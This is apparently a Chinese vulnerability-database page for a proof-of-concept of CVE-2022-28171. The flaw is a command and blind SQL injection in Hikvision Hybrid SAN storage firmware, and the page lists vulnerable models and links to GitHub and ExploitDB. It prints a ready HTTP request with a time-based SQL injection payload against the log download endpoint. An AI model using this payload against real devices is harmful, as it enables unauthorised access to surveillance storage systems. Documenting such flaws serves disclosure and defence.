漏洞平台

POC详情： 3eb39296d6a4a9e53244528bd47e58b73b308897

来源

https://github.com/Sapphire2017/CVE-2022-28171-POC

关联漏洞

标题： Hikvision Hybrid SAN/Cluster Storage 命令注入漏洞 (CVE-2022-28171)
描述：Hikvision Hybrid SAN/Cluster Storage Products是中国海康威视（Hikvision）公司的一系列经济可靠的混合 SAN（存储区域网络）产品。 Hikvision Hybrid SAN/Cluster Storage 存在安全漏洞，该漏洞源于 web 模块输入验证不足。攻击者利用该漏洞通过发送带有恶意命令的消息来执行受限命令。

介绍

# CVE-2022-28171-POC

I originally published this on ExploitDB, which you can find at https://www.exploit-db.com/exploits/51607

### Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

```
# Date: 16  July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
```
### Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, Blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution, which was possible to execute arbitrary operating system commands and more.

### Vulnerability description
 The manual test confirmed that The "downloadtype" parameter was vulnerable to Blind SQL injection and Command Injection.
I created a Python script to automate and enumerate SQL versions as the Application was behind the firewall and block all the requests from SQLmap. 

### Request Body
```
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
```

文件快照


 [4.0K]  /data/pocs/3eb39296d6a4a9e53244528bd47e58b73b308897
├── [1.7K]  BlindSQL_Injection.py.md
├── [1.9K]  Command Injection.py.md
└── [1.9K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。